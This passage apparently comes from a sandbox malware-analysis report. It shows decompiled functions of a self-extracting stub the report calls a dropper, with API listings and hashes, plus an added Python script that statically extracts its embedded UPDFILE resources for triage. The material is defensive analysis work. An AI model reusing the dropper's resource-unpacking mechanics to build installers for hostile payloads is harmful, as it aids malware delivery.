		_t22 = _a12;
		if(_t22 < 6) {
			goto L11;
		}
		if(_t22 <= 7) {          // 6 = IDYES, 7 = IDNO
			L8:
			EndDialog(_a4, _t22);
			return 1;
		}
		if(_t22 != 0x839) {
			goto L11;
		}
		 *0x1791dc = 1;          // global flag set for control 0x839, then close like IDYES/IDNO
		goto L8;
	}
	return 0;
}

0x00173459
0x0017345c
0x001734d8
0x001734de
0x00000000
0x001734e0
0x0017345e
0x00173463
0x0017349a
0x001734a0
0x001734a7
0x001734b2
0x001734c4
0x001734cb
0x00000000
0x001734cb
0x00173468
0x0017346e
0x00173474
0x00000000
0x00000000
0x0017347c
0x0017348c
0x00173490
0x00000000
0x00173496
0x00173484
0x00000000
0x00000000
0x00173486
0x00000000
0x00173486
0x00000000

APIs
• EndDialog.USER32(?,?), ref: 00173490
• GetDesktopWindow.USER32 ref: 0017349A
• SetWindowTextA.USER32(?,nst0dum), ref: 001734B2
• SetDlgItemTextA.USER32(?,00000838), ref: 001734C4
• SetForegroundWindow.USER32(?), ref: 001734CB
• EndDialog.USER32(?,00000002), ref: 001734D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: nst0dum
• API String ID: 852535152-432003757
• Opcode ID: 4e68f766f562ae1965fb229ffe3430605554ec1e973e9b0b704e232cbdfb38e7
• Instruction ID: ae8c3f0713f4439e6a3378e4ec88941bc416cb93581deddd4acaf6e4ce3a97ed
• Opcode Fuzzy Hash: 4e68f766f562ae1965fb229ffe3430605554ec1e973e9b0b704e232cbdfb38e7
• Instruction Fuzzy Hash: DE019E31294114ABD71E5F68DC0C96D3B74EF49711F90C020FA6F869A0CB319BD1EB95
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00172AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x178004; // 0x4ffa21aa
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x179a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00171680(_t65, E001717C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E001765E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00171680(_t65, E001717C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00176CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}























APIs
• GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00172AE6
• IsDBCSLeadByte.KERNEL32(00000000), ref: 00172AF2
• CharNextA.USER32(?), ref: 00172B12
• CharUpperA.USER32 ref: 00172B1E
• CharPrevA.USER32(?,?), ref: 00172B55
• CharNextA.USER32(?), ref: 00172BD4
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
• String ID:
• API String ID: 571164536-0
• Opcode ID: 97a707f99452b9021b1c7f30e9b1592e93c42f5cf8d6417dbae07ebccb09a327
• Instruction ID: bdc93ad2924179743bd5e99596cc52682c8b15844bdb9909e3db1a149f4557c0
• Opcode Fuzzy Hash: 97a707f99452b9021b1c7f30e9b1592e93c42f5cf8d6417dbae07ebccb09a327
• Instruction Fuzzy Hash: AA4126345082855FDB259F348C54AFD7BB99F96300F54809AE8CE87602DB758EC7CBA1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E001743D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x178004; // 0x4ffa21aa
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

(address column of the C-code listing above: 0x001743d0 - 0x001744b8)

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001743F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0017440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00174423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0017442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0017443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00174447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001744A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: 917923042d23b1d6c374855c091832244aaa1db5d3f742f7ff3465f355123437
                                                                                                                                                                                                    • Instruction ID: 3582d8b4ec91ed7fa879126e0d7608be7122eca0fc9d93402fc136d0cfee58b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 917923042d23b1d6c374855c091832244aaa1db5d3f742f7ff3465f355123437
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03312D72E00119AFDB14CFB8DD899EEBBB5EF89310F554169F80AB3250DB306D458B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
			E00176298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				// __security_cookie; _v8 is the /GS stack cookie that E00176CE0 verifies on return
				_t16 =  *0x178004; // 0x4ffa21aa
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx; // caller-supplied callback, invoked once per resource record
				_v36 = 0; // resource counter
				_t36 = 1; // return value: 1 = success, cleared on failure
				// snprintf-style helper: builds "UPDFILE0" in the 0x14-byte stack buffer _v28
				E0017171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					// hModule 0 = the running image; 0xa = RT_RCDATA
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break; // no further UPDFILE<n> resource: normal end of the walk
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						// HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND): LockResource returned NULL
						 *0x179124 = 0x80070714;
						_t36 = _t46;
					} else {
						// record layout: two DWORDs at +0 and +4, then a NUL-terminated ANSI name at +8
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						// inline strlen(name) with no upper bound: a truncated resource is read past its end
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						// pointer read from 0x17a288 (likely an IAT slot), called with
						// (dword0, dword1, name, name + strlen(name) + 1 = the record payload)
						 *0x17a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32(); // then the caller's callback; zero means stop with failure
						// int 0x29 is __fastfail; the always-false compare is the decompiler's rendering
						// of the stack-pointer consistency check after the indirect call
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							// next resource name, "UPDFILE%lu" with the incremented counter
							E0017171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					// stack-cookie check, then return _t36
					return E00176CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}

Instruction addresses the report associates with this function's decompiled lines (0x00000000 = no address):
0x00176298 0x001762a0 0x001762a7 0x001762ad 0x001762af 0x001762bb 0x001762c3 0x001762c4 0x0017633b 0x0017633b
0x00176345 0x0017634d 0x00000000 0x00000000 0x001762da 0x001762de 0x0017635f 0x00176369 0x001762e0 0x001762e0
0x001762e0 0x001762e3 0x001762e5 0x001762e5 0x001762e8 0x001762e8 0x001762ea 0x001762eb 0x001762ef 0x001762f1
0x001762f3 0x00176302 0x00176308 0x0017630d 0x00176314 0x00176314 0x00176316 0x00176319 0x00176355 0x00176357
0x0017631b 0x0017631b 0x00176331 0x00176334 0x00176339 0x00000000 0x00176339 0x00176319 0x0017636b 0x0017637d
0x0017637d 0x00000000

APIs
  • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
  • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 001762CD
  • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 001762D4
  • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 0017631B
  • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00176345
  • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 00176357
Memory Dump Source
  • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
  • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
  • API ID: Resource$Free$FindLoadLock_vsnprintf
  • String ID: UPDFILE%lu
  • API String ID: 2922116661-2329316264
  • Opcode ID: 0cf32194e66d5a5ebbca765427ccb04c27422bc08b282b1e2472ed6b88a7d6e9
  • Instruction ID: 797bbfd4b95d557ce98753a1fd8146a5f286e62f58544a43d8b165745fb0f74a
  • Opcode Fuzzy Hash: 0cf32194e66d5a5ebbca765427ccb04c27422bc08b282b1e2472ed6b88a7d6e9
  • Instruction Fuzzy Hash: 6721F671A00619ABDB149F64CC459BE7B7CFF88710B108119F90EA3641DB359D86CBE1
Uniqueness
  Uniqueness Score: -1.00%
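The loop in the function above resolves resources by name ("UPDFILE%lu", with 0xA = RT_RCDATA as the third FindResourceA argument), loads and locks each one, and frees it before formatting the next name. The Python script below is added here as an editor's example; it is not code from the report, the sample, or Joe Sandbox. It does the same walk statically, parsing a raw .rsrc section (bytes plus the section's RVA, both obtainable from any PE parser or a hex editor) and returning every RCDATA entry named UPDFILE<n>, so the embedded files can be triaged without running the dropper. It uses only the standard library. The blob built by build_rsrc() at the bottom is constructed for demonstration and assumes the usual three-level layout (type, name, language) with a single language entry 0x409; the payload contents are made up.

```python
"""Statically enumerate RT_RCDATA resources named UPDFILE<n> from a .rsrc section.

Added example (not from the analysed sample): mirrors the FindResourceA /
LoadResource / LockResource loop in the decompiled function, but offline.
"""
import re
import struct

RT_RCDATA = 10                               # lpType the dropper passes to FindResourceA
NAME_RE = re.compile(r"^UPDFILE(\d+)$")      # the "UPDFILE%lu" naming pattern


def _read_name(rsrc: bytes, off: int) -> str:
    # IMAGE_RESOURCE_DIR_STRING_U: u16 length in WCHARs, then UTF-16LE characters
    (n,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2: off + 2 + 2 * n].decode("utf-16-le")


def _entries(rsrc: bytes, off: int):
    """Yield (id_or_name, target_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_ids = struct.unpack_from("<HH", rsrc, off + 12)
    pos = off + 16
    for _ in range(n_named + n_ids):
        name_field, data_field = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        key = _read_name(rsrc, name_field & 0x7FFFFFFF) if name_field & 0x80000000 else name_field
        yield key, data_field & 0x7FFFFFFF, bool(data_field & 0x80000000)


def extract_updfiles(rsrc: bytes, rsrc_rva: int) -> dict:
    """Return {n: payload_bytes} for every RT_RCDATA resource named UPDFILE<n>."""
    found = {}
    for type_key, type_off, is_dir in _entries(rsrc, 0):
        if type_key != RT_RCDATA or not is_dir:
            continue
        for name_key, name_off, name_is_dir in _entries(rsrc, type_off):
            m = NAME_RE.match(name_key) if isinstance(name_key, str) else None
            if not m or not name_is_dir:
                continue
            for _lang, data_off, lang_is_dir in _entries(rsrc, name_off):
                if lang_is_dir:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, not a section offset
                data_rva, size = struct.unpack_from("<II", rsrc, data_off)
                start = data_rva - rsrc_rva
                found[int(m.group(1))] = rsrc[start:start + size]
                break                         # first language entry only
    return found


def build_rsrc(payloads: dict, rsrc_rva: int) -> bytes:
    """Construct a minimal .rsrc section (type -> name -> lang -> data) for testing."""
    names = sorted(payloads)                  # named entries are stored sorted
    n = len(names)
    type_dir = 24
    name_dir = [40 + 8 * n + 24 * i for i in range(n)]
    data_ent = [40 + 32 * n + 16 * i for i in range(n)]
    str_off, cur = {}, 40 + 48 * n
    for nm in names:
        str_off[nm], cur = cur, cur + 2 + 2 * len(nm)
    data_off, cur = {}, (cur + 3) & ~3
    for nm in names:
        data_off[nm], cur = cur, cur + len(payloads[nm])
    buf = bytearray(cur)

    def dir_header(off, named, ids):          # IMAGE_RESOURCE_DIRECTORY, counts at +12/+14
        struct.pack_into("<IIHHHH", buf, off, 0, 0, 0, 0, named, ids)

    dir_header(0, 0, 1)
    struct.pack_into("<II", buf, 16, RT_RCDATA, 0x80000000 | type_dir)
    dir_header(type_dir, n, 0)
    for i, nm in enumerate(names):
        struct.pack_into("<II", buf, type_dir + 16 + 8 * i,
                         0x80000000 | str_off[nm], 0x80000000 | name_dir[i])
        struct.pack_into("<H", buf, str_off[nm], len(nm))
        buf[str_off[nm] + 2: str_off[nm] + 2 + 2 * len(nm)] = nm.encode("utf-16-le")
        dir_header(name_dir[i], 0, 1)
        struct.pack_into("<II", buf, name_dir[i] + 16, 0x409, data_ent[i])  # leaf: high bit clear
        struct.pack_into("<IIII", buf, data_ent[i], rsrc_rva + data_off[nm], len(payloads[nm]), 0, 0)
        buf[data_off[nm]: data_off[nm] + len(payloads[nm])] = payloads[nm]
    return bytes(buf)


# Constructed demo content (not data from the analysed file).
DEMO_PAYLOADS = {
    "UPDFILE0": b"MZ\x90\x00" + b"\x00" * 12,  # stand-in for an embedded PE
    "UPDFILE1": b"CONFIG=1\r\n",
    "README": b"not an UPDFILE entry",         # must be ignored by the extractor
}
DEMO_RVA = 0x6000


def demo() -> dict:
    return extract_updfiles(build_rsrc(DEMO_PAYLOADS, DEMO_RVA), DEMO_RVA)


if __name__ == "__main__":
    for idx, data in sorted(demo().items()):
        print(f"UPDFILE{idx}: {len(data)} bytes, starts {data[:4]!r}")
```

Against a real sample, feed extract_updfiles() the raw .rsrc section and its VirtualAddress from the section table instead of the demo blob. FindResourceA selects a language entry from the caller's locale; the extractor simply takes the first one, which is sufficient for the single-language case a self-extracting stub normally carries.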

C-Code - Quality: 94%
			E0017681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x178004; // 0x4ffa21aa -- /GS security cookie (global in the writable 0x178000 region)
				_v8 = _t19 ^ _t44; // cookie XOR frame pointer, re-checked by E00176CE0 on return
				_t41 =  *0x1781d8; // 0x0 -- cached result; 0xfffffffe means "not computed yet"
				_t43 = 0;
				_v180 = 0xc; // cbData for RegQueryValueExA: _v20 receives at most 12 bytes
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x1781d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94; // sizeof(OSVERSIONINFOA) = 148
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x1781d8; // 0x0
					} else {
						_t41 = 1;
						// Only Windows 95 qualifies (dwPlatformId 1 = VER_PLATFORM_WIN32_WINDOWS, version 4.x with minor < 10),
						// and only with Middle East language support on (GetSystemMetrics(0x4a) = SM_MIDEASTENABLED).
						// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ.
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x171140, 0,  &_v184,  &_v20,  &_v180); // 0x171140 points at the value-name string; its text is not reproduced in this listing
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E001766F9( &_v20,  &_v176) == 0) { // presumably parses the registry string in _v20 into the number stored in _v176
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff; // PRIMARYLANGID of the locale value
									if(_t35 == 1 || _t35 == 0xd) { // LANG_ARABIC (0x01) or LANG_HEBREW (0x0d)
										 *0x1781d8 = _t41; // cache: 1 = right-to-left locale on Windows 95
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00176CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43); // epilogue: /GS stack-cookie check
			}


















Address column (decompiler line-to-address map, detached from the code above by extraction): 0x0017681f to 0x00176951, 40 entries; 0x00000000 marks lines with no address.

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0017686E
• GetSystemMetrics.USER32(0000004A), ref: 001768A7 (0x4A = SM_MIDEASTENABLED)
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001768CC (0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ)
• RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,?,0000000C), ref: 001768F4
• RegCloseKey.ADVAPI32(?), ref: 00176902
  • Part of subcall function 001766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0017691A), ref: 00176741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 001768C2
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: a35a29c83141037a66deec5bfb78acb54f4aff2f2e9877cb5ce5bfa460c2154e
• Instruction ID: 343b6b3f77ec8d7fb9b236689a17c1a2e8b128348961c9919766948028f4d577
• Opcode Fuzzy Hash: a35a29c83141037a66deec5bfb78acb54f4aff2f2e9877cb5ce5bfa460c2154e
• Instruction Fuzzy Hash: E5316F31A406189FDB21DF12CC45BAAB7B8FF45768F4081A5EA4DA6540DB309EC5CF52
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00173A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				/* Loads the RT_RCDATA resource named "LICENSE" (E0017468F: FindResourceA with type 0xA,
				   SizeofResource/LoadResource/LockResource/memcpy_s per the subcall references below) and
				   presents it unless the text is "<None>". The result HRESULT is stored at *0x179124.
				   _t1, _t19 and _t28 are undeclared decompiler temporaries, left as emitted. */
				_t16 = "LICENSE";
				_t1 = E0017468F(_t16, 0, 0) + 1; // 0x1          /* first call without a buffer: resource size, +1 for the NUL */
				_t3 = LocalAlloc(0x40, _t1);                      /* 0x40 = LPTR (fixed, zero-initialised) */
				 *0x178d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0017468F(_t16, _t3, _t28) != 0) {          /* second call copies the resource into the buffer */
						if(lstrcmpA( *0x178d4c, "<None>") == 0) {      /* no license text: skip the dialog and succeed */
							LocalFree( *0x178d4c);
							L9:
							 *0x179124 = 0;
							return 1;
						}
						_t9 = E00176517(_t19, 0x7d1, 0, E00173100, 0, 0);   /* presumably the license dialog: resource ID 0x7d1 (2001), E00173100 as its callback */
						LocalFree( *0x178d4c);
						if(_t9 != 0) {
							goto L9;                                       /* non-zero return: accepted */
						}
						 *0x179124 = 0x800704c7;                          /* HRESULT_FROM_WIN32(ERROR_CANCELLED = 1223): user declined */
						L2:
						return 0;
					}
					E001744B9(0, 0x4b1, 0, 0, 0x10, 0);               /* LoadStringA(0x4b1) and an error box, 0x10 = MB_ICONERROR */
					LocalFree( *0x178d4c);
					 *0x179124 = 0x80070714;                           /* HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND = 1812) */
					goto L2;
				}
				E001744B9(0, 0x4b5, 0, 0, 0x10, 0);                   /* LocalAlloc failed: string 0x4b5 */
				 *0x179124 = E00176285();                            /* error HRESULT supplied by E00176285 (not shown here) */
				goto L2;
			}

Address column (decompiler line-to-address map, detached from the code above by extraction): 0x00173a46 to 0x00173b21, 30 entries; 0x00000000 marks lines with no address.

APIs
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
  • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
  • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
  • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
  • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
  • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F64,?,00000002,00000000), ref: 00173A5D
• LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00173AB3
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
  • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
• lstrcmpA.KERNEL32(<None>,00000000), ref: 00173AD0
• LocalFree.KERNEL32 ref: 00173B13
  • Part of subcall function 00176517: FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
  • Part of subcall function 00176517: LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
  • Part of subcall function 00176517: DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
  • Part of subcall function 00176517: FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
• LocalFree.KERNEL32(00000000,00173100,00000000,00000000), ref: 00173AF4
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
